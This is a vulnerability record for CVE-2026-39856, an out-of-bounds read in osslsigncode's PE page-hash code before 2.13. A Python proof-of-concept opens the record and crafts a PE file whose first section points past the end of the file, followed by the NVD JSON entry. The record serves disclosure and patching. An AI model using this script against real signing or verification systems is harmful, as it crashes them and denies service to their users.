CVE-2026-39856

import pefile import sys # Usage: python poc.py input.exe output.exe def create_malicious_pe(input_path, output_path): try: # Load the original PE file pe = pefile.PE(input_path) # Check if there are sections if not pe.sections: print("No sections found in the PE file.") return # Modify the first section's PointerToRawData to point beyond the file size # This triggers the out-of-bounds read in osslsigncode during page hash calculation original_raw_size = pe.sections[0].SizeOfRawData file_size = pe.OPTIONAL_HEADER.SizeOfImage # Set PointerToRawData to a value outside the file (e.g., file_size + 0x1000) pe.sections[0].PointerToRawData = file_size + 0x1000 pe.sections[0].SizeOfRawData = 0x1000 # Write the modified PE file pe.write(output_path) print(f"Malicious PE file created at: {output_path}") print(f"Modified Section: {pe.sections[0].Name.decode()}") print(f"New PointerToRawData: {hex(pe.sections[0].PointerToRawData)}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python poc.py <input_exe> <output_exe>") else: create_malicious_pe(sys.argv[1], sys.argv[2])

{"cve": {"id": "CVE-2026-39856", "sourceIdentifier": "[email protected]", "published": "2026-04-09T17:16:29.310", "lastModified": "2026-04-17T19:59:36.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "osslsigncode is a tool that implements Authenticode signing and timestamping. Prior to 2.13, an out-of-bounds read vulnerability exists in osslsigncode version 2.12 and earlier in the PE page-hash computation code (pe_page_hash_calc()). When processing PE sections for page hashing, the function uses PointerToRawData and SizeOfRawData values from section headers without validating that the referenced region lies within the mapped file. An attacker can craft a PE file with section headers that point beyond the end of the file. When osslsigncode computes page hashes for such a file, it may attempt to hash data from an invalid memory region, causing an out-of-bounds read and potentially crashing the process. The vulnerability can be triggered while signing a malicious PE file with page hashing enabled (-ph), or while verifying a malicious signed PE file that already contains page hashes. Verification of an already signed file does not require the verifier to pass -ph. This vulnerability is fixed in 2.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:osslsigncode_project:osslsigncode:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13", "matchCriteriaId": "3F16716F-B2C3-41F9-B32B-CFD011129F12"}]}]}], "references": [{"url": "https://github.com/mtrojnar/osslsigncode/commit/92f8761b4770f76a36731969b5040ce3b9a09570", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mtrojnar/osslsigncode/releases/tag/2.13", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/mtrojnar/osslsigncode/security/advisories/GHSA-rjrx-chvw-8jw8", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}